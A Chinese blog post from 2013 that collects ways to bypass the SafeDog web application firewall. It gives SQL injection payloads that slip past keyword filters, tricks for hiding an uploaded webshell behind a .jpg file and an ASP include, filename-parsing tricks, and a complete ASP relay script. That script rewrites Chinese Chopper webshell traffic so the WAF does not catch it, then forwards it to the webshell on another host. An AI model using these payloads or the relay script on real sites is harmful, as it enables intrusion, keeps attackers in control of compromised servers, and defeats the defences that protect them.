过安全狗技术总汇

Jonty

2013-09-03 / 0 评论 / 104 阅读 / 正在检测是否收录...

09/03

1.过注入

2.过大马被阻拦访问

3.过菜刀连接一句话被拦截

4.过1.asp;.jpg这样的文件

{tabs-pane label="1.过注入"}
方法一： a.asp?aaa=%00&id=sql语句
方法二： a.asp?id=sql语句，里面把安全过滤的加个%l比如： un%aion sel%aect 1,2,3,4 fr%aom admin
{/tabs-pane}
{tabs-pane label="2.过大马被阻拦访问"}
方法一： 上传一个大马然后访问http://sss.com/dama.asp 访问后出现拦截。
那么解决方法先将dama.asp改名dama.jpg上传，然后在同目录上传个文件da.asp 内容为： <!–#include file=”dama.jpg” –> 这样再访问da.asp 就不会被拦截了。
{/tabs-pane}
{tabs-pane label="3.过菜刀连接一句话被拦截"}
方法一： 不用菜刀连接一句话，用别的一句话连接端。
方法二： 中转下连接菜刀，把过滤掉的词替换掉。
{/tabs-pane}
{tabs-pane label="4.过1.asp;.jpg这样的文件拦截"}
方法一： ;1.asp ;.jpg
{/tabs-pane}

下面这个脚本是过安全狗连接菜刀用的用法：
先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀密码还是你要过的那个webshell的密码类型也是选择那个一句话木马的后缀类型
例如：http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀
这个脚本暂时支持.php .aspx的一句话连接.asp的可能还不行没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持！

<%
'饶过的原理，抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 就成！
JmStr=Replace(Request.Form,"$_POST","$_REQUEST")
JmStr=Replace(JmStr,"->|","-->|")
JmStr=Replace(JmStr,"@eval(","@eval (")
JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")
JMUrl=request("dz")
response.write request("dz")
JmRef=JMUrl
JmCok=""
response.write PostData(JMUrl,JmStr,JmCok,JmRef)

Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "POST",PostUrl,False
.SetRequestHeader "Content-Length",Len(PostStr)
.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
.SetRequestHeader "Referer",PostRef
'.SetRequestHeader "Cookie",PostCok
.Send PostStr
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &amp;H80 Then
strReturn = strReturn &amp; Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn &amp; Chr(CLng(ThisCharCode) * &amp;H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function

Function URLEncoding(vstrin)
strReturn=""
Dim i
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &amp;HFF Then
strReturn=strReturn &amp; ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &amp;H10000
End If
Hight1=(InnerCode And &amp;HFF00) \&amp;HFF
Low1=InnerCode And &amp;HFF
strReturn=strReturn &amp; "%" &amp; Hex(Hight1) &amp; "%" &amp; Hex(Low1)
End if
Next
strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
strReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW增加转换+字符
'strReturn=Replace(strReturn,过滤字符,"转换为字符") '在此增加要过滤的代码
URLEncoding=strReturn
End Function
%>

本文共 422 个字数,平均阅读时长 ≈ 2分钟

打赏

过安全狗技术总汇

1.过注入

2.过大马被阻拦访问

3.过菜刀连接一句话被拦截

4.过1.asp;.jpg这样的文件

评论 (0)

Jonty

绿水本无忧，因风皱面

青山原不老，为雪白头